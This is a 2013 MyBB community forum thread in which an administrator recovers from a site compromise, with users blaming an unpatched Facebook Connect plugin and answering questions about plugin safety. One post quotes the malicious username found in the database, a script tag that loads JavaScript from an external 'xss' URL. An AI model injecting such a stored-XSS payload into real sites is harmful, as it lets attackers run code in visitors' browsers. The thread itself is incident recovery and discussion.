Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
URGENT: My website using mybb forum is hacked today
#11
seems like you're using fb connect plugin and allow users to select thier own username... go to your phpmyadmin then edit users table and delete the user named something like this <script blah blah blah>
#12
(2013-01-11, 04:44 PM)melchor Wrote: seems like you're using fb connect plugin and allow users to select thier own username... go to your phpmyadmin then edit users table and delete the user named something like this <script blah blah blah>

No, that's not it. All of his files are missing.
-Paul H.

Cogisne lingua latina?
#13
(2013-01-11, 05:17 PM)Paul H. Wrote:
(2013-01-11, 04:44 PM)melchor Wrote: seems like you're using fb connect plugin and allow users to select thier own username... go to your phpmyadmin then edit users table and delete the user named something like this <script blah blah blah>

No, that's not it. All of his files are missing.

it happens to me before sir.. The same hacker he is using some sort of javascript.. May files are intact i just delete the user in phpmyadmin and my site is okey.. He only attack those who is using fb connect plugin
#14
(2013-01-12, 01:47 AM)melchor Wrote:
(2013-01-11, 05:17 PM)Paul H. Wrote:
(2013-01-11, 04:44 PM)melchor Wrote: seems like you're using fb connect plugin and allow users to select thier own username... go to your phpmyadmin then edit users table and delete the user named something like this <script blah blah blah>

No, that's not it. All of his files are missing.

it happens to me before sir.. The same hacker he is using some sort of javascript.. May files are intact i just delete the user in phpmyadmin and my site is okey.. He only attack those who is using fb connect plugin

That's not how gginni's site was hacked though. If you look at the HTML source you can see it's no using a JavaScript username hack, or a index template edit. The hackers gained filesystem access.


gginni , we can't help you with it as it sin't a MyBB problem. Be sure to change your email and hosting passwords. Do you have a recent backup?
-Paul H.

Cogisne lingua latina?
#15
Thanks guys for ur replies... I was busy in recovering back my website... I have deleted the mybb root folder itself to make sure that hacker didn't made any changes in my file system... Nd installed fresh Mybb 1.6.8... changed the database connection string to old as my database is safe... Then upgraded it to 1.6.9... And only installed 2 plugins till now..Google SEO and New Points...

Now I have default theme... I was using TheCure theme earlier...

I'm on shared hosting and I asked for all the IP logs from my hosting provider that accessed my cpanel and couldn't find any other IP except mine who accessed my cpanel...

I guess melchor is correct... Fbconnect plugin was culprit..Please stop using that plugin asap...I saw one username in my db... username was:-
<script src="http://accureaders.com/xss/"></script>

I guess this username did the trick...

Cannot share my board URL as it is now recovered and I don't want hacker to attack again Smile

I was using below plugins:-
1. Google SEO
2. New Points
3. Fbconnect - Most probably the culprit... but still m not sure... need expert reviews on this plugin...
4. Page Manager - Please guys tell me is it safe to use page manager??? I had around 7-8 custom pages built using this plugin... I have not installed this plugin till now but I need this plugin badly...
5. Like/Thank you plugin - I want to install this as well..Please tell if it's safe
6. Alert feature recently installed just 3-4 days back - http://community.mybb.com/thread-119331.html ... It is not featured in mybb plugins yet..Please guys tell me is it safe to use this plugin... I want this plugin as it is best plugin but don't want to compromise my website for this plugin... If any guy can do a security review for this plugin then it will be great Smile
7. Smileypack
8. PM log
9. Delete reason - is it safe??
10. Advanced quick reply - Is it safe???
11. Shoutbox - will not install again but is it safe??
12. my threads my posts
13. Registration Security Question - I read on some other forums as well as google that this plugin also have security risks... Guys I installed this as bots were registering on my forum... I don't want any bot to register on my forum... Please guys tell me secured alternative for this plugin.. i want to restrict spam bots to register on my website ... Nd please tell me secured plugin
14. Undo delete - is it safe?
15. Welcome PM - is it safe as I want to use this plugin as well

TheCureTheme - Please guys tell me whether this theme have any issues??? I want to install this theme back... I will not do anything until I get expert comments

Please experts reply me fast... I need to install theme as well as I need to add plugins...

I will wait for experts response Smile

Thanks guys for ur help till now Smile
#16
where did you get the fbconnect plugin? that plugin was updated like a year ago for the vulnerability that got you. both the version here and at the authors site were patched
Lost interest, sold my sites, will browse here once in a while. It's been fun.
#17
Shoutbox -- probably safe; MyShoutbox is developed by Pirata. Toungue
#18
@paveman:- I guess I didn't update that plugin Sad...

@Sting:- Thanks for telling that shoutbox is safe Smile

Need to know about other plugins..plz tell me guys Smile
#19
All of the plugins are safe, apart from a few (depending on the version you're running). What version of NewPoints are you running?
No longer involved in the MyBB project.
#20
1.9.5 Toungue... But will install 1.9.7 within next 2 hours... Right now don't want to close the board as I have around 100 active users Smile...

Will close board after 2 hours and will install new points 1.9.7 Smile


Forum Jump:


Users browsing this thread: 1 Guest(s)